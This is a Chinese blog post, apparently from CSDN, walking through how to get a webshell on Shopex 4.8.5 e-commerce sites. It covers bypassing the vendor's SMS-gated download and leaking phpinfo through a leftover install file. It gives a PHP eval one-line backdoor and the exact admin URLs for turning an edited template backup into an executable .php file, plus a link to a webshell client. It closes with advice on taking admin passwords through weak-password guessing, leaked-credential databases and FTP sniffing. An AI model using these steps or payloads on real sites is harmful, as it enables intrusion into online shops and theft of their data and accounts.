Shopex4.85 cms后台管理员权限获取webshell

simeon
Shopex(上海商派网络科技有限公司的简称)成立于2002年,是中国电子商务技术及服务提供商,主要向市场提供PC端、移动端和线下的软件系统及相关服务。阿里巴巴、联想和贝塔斯曼对其进行了投资,其开发的shopex cms是一个独立电子商务软件系统,依托SaaS理念(是Software-as-a-service软件即服务的简称),软件本身免费提供,企业可以利用它快速建立独立电子商务平台,从而拥有独立的域名、独立的客户系统、独立的业务数据和业务体系,Shopex是国内市场占有率最高的网店软件。在渗透过程中碰到一个目标系统安装了安全狗防护系统,因此才有了对shopex系统渗透的研究。研究结果表明,只有获取管理员密码的情况下,比较容易获取webshell。
1.搭建测试平台
(1)下载源代码绕过短信验证漏洞
本次渗透需要下载shopex4.8.5版本,官方需要提供手机号码进行短信验证,然后给出下载地址,而我等屌丝不愿意将手机号码泄漏,只好想办法,通过研究发现其下载访问地址隐藏在网页文件中,通过访问地址:
http://www2.shopex.cn/customer-download.html?target_name=RUNTaG9wJUU1JTg1JThEJUU4JUI0JUI5JUU0JUJEJTkzJUU5JUFBJThDJUU0JUI4JThCJUU4JUJEJUJEJTI4VVRGLTglMjk=&referer_url=aHR0cCUzQSUyRiUyRnd3dy5lY3Nob3AuY29t&product_cat_p=1003&product_cat_c=1016&clues_source_p=1009&clues_source_c=1033&target_download=aHR0cCUzQSUyRiUyRmRvd25sb2FkLmVjc2hvcC5jb20lMkYyLjcuMyUyRkVDU2hvcF9WMi43LjNfVVRGOF9yZWxlYXNlMTEwNi5yYXI=&encode=true
使用google浏览器chrome审查元素,使用ctrl+F键搜索download即可获取下载地址:
点此直接下载
如图1所示,其地址http://click.shopex.cn/free_click.php?id=107即为下载shopex-single-4.8.5.82977.zip地址,同理其其它cms源代码也可以通过这个方法下载。
在这里插入图片描述
图1获取shopex下载地址
(2)安装php+mysql+apache环境
可以安装php整合软件Comsenz来搭建实验环境,Comsenz最新版本为2.5,其下载地址:http://www.comsenz.com/downloads/install/exp/
(3)安装shopex4.8.5
将shopex4.8.5程序复制到网站根目录,然后访问http://192.168.206.129/shopex/install/index.php进行安装,按照提示进行安装即可,安装结束后会要求提供shopExID,这个id可以通过注册免费获取,不需要填写真实信息,随便填写一个信息,注册成功后登录后,访问http://my.shopex.cn/index.php?ctl=my&act=product就可以获取shopExID,如图2所示,否则无法访问后台,我从网上下载了好几个声称破解版均未测试成功。将该shopExID和注册的密码输入进行验证即可通过授权验证。
在这里插入图片描述
图2获取shopExID
(4)获取php环境信息
如果install/svinfo.php文件未被删除,通过访问http://192.168.206.128/shopex/install/svinfo.php?phpinfo=true即可获取php环境等信息,这些信息对进一步渗透很有帮助,获取操作系统、路径(DOCUMENT_ROOT、SCRIPT_FILENAME)以及相关配置等信息,如图3所示。
在这里插入图片描述
图3获取phpinfo信息
2.后台管理员权限通过模板编辑获取webshell
(1)编辑info.xml文件
进入后台后,单击“页面管理”-“模板管理”-“模板列表”-“模板文件管理”,查看当前使用的模板文件信息,直接对info.xml进行编辑。或者访问地址:
http://192.168.206.128/shopex/shopadmin/index.php#ctl=system/tmpimage&act=detail&p[0]=/1354864820-info.xml,可以直接读取和修改info.xml文件内容,如图4所示。
在这里插入图片描述
图4查看和编辑模板文件
(2)修改模板文件内容
直接修改info.xml文件的内容,其内容可以是一句话后门<?php @eval($_POST['cmd']);?>,也可以是大马等。保存一次后,会显示“文件修改历史”,在下面会显示文件修改的备份文件。如图5所示,复制还原链接地址,并将p[1]=info.xml文件修改为p[1]=info.php,p[1]可以是任何php文件,比如p[1]=antian365.php等。 也可以直接访问以下地址:http://192.168.206.129/shopex/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_2.xml&p[1]=info.php&p[2]=1354864820
在这里插入图片描述
图5修改文件内容并保存
(3)获取shell
再次访问模板文件管理,即可查看刚才生成的info.php文件,如图6所示,一句话后门地址为:http://192.168.206.129/shopex/themes/1354864820/info.php。
在这里插入图片描述
图6生成webshell
(6)测试webshell
使用一句话后门最新版本,下载地址(http://www.maicaidao.com/caidao-20141213.zip),新增一条记录,如图7所示,说明webshell获取成功。
在这里插入图片描述
图7获取webshell
4.后台管理员密码获取
对于通过后台进行管理员密码更改的,其加密方式虽然是md5加密,但根据网上资料普通会员加密值是md5(md5(passwod).md5(regtime).admin)),这个值即使是最简单的密码恐怕破解不了。因此通过注入获取管理员的密码意义不大,而笔者建议通过后台进行社工测试,一是通过知道的管理员账号,绝大部分默认为admin,输入一些简单密码进行登录测试;第二个就需要社工库进行查询,通过查询管理员或者网站管理员的邮箱等信息进行查询。第三个就是通过嗅探ftp等方式。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是simeon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值